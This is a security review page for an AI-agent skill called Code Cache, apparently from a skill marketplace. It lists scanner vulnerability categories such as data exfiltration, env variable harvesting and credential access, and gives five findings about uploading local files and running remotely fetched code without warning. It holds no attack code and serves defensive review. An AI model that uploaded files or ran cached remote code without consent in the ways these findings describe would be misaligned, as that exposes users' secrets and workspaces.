ClawHub

Code Cache

Security checks across malware telemetry and agentic risk

Overview

This appears to be a real code-cache integration, but it needs review because it sends selected local code to a third-party service and writes remotely retrieved code files locally for possible execution.

Install only if you are comfortable sending selected source files and task descriptions to Raysurfer and receiving code back from that service. Use a dedicated API key, avoid uploading secrets or proprietary code unless approved, review cached code before running it, run retrieved code in a constrained sandbox, and avoid using the files command in sensitive directories until filename/path validation is added.

SkillSpector

By NVIDIA
Vulnerability Patterns
  • Data ExfiltrationExternal Transmission, Env Variable Harvesting, File System Enumeration
  • Prompt InjectionInstruction Override, Hidden Instructions, Exfiltration Commands
  • Privilege EscalationExcessive Permissions, Sudo/Root Execution, Credential Access
  • Supply ChainUnpinned Dependencies, External Script Fetching, Obfuscated Code
  • Excessive AgencyUnrestricted Tool Access, Autonomous Decision Making, Scope Creep
Findings (5)

Missing User Warnings

Medium
Confidence
93% confidence
Finding
The README explicitly promotes retrieving and executing code from prior executions via an external service, but provides no warning that cached code may be untrusted, stale, or malicious. In an agent context, encouraging direct execution of remotely sourced code materially increases the risk of arbitrary code execution, credential theft, filesystem access, and supply-chain compromise.

Missing User Warnings

Medium
Confidence
91% confidence
Finding
The README describes downloading executable code into the sandbox and uploading successful executions, but does not warn that uploaded code may contain secrets, proprietary logic, personal data, or environment-specific information. This can lead to unintended data exfiltration to the external service and later redistribution of sensitive code to other users through the cache.

Missing User Warnings

Medium
Confidence
95% confidence
Finding
The skill encourages uploading code and task descriptions to the Raysurfer service, but the user-facing description does not clearly warn that potentially sensitive code, prompts, or execution artifacts are transmitted to an external API/cache. Because this skill is specifically designed to store and retrieve prior code executions, the context makes the omission more dangerous: agents may send proprietary source code, secrets embedded in files, or confidential task descriptions off-platform without informed consent.

Missing User Warnings

Medium
Confidence
94% confidence
Finding
The upload command reads arbitrary local files and sends their full contents to a remote Raysurfer API, but the CLI does not provide an explicit warning, confirmation step, or clear data-handling notice at the point of upload. In an agent-skill context, this is risky because agents may be directed to upload files automatically and users may not realize sensitive source code, secrets, or proprietary data are being exfiltrated to a third party.

Missing User Warnings

Medium
Confidence
92% confidence
Finding
The files command retrieves code from a remote service and writes it directly into local files under the chosen cache directory without validation, warning, or confirmation. In this skill's context, the downloaded content is executable code intended for reuse by agents, so silently materializing remote code locally increases the chance of planting malicious or unsafe code into a workspace and having it later reviewed or executed.

VirusTotal

60/60 vendors flagged this skill as clean.

View on VirusTotal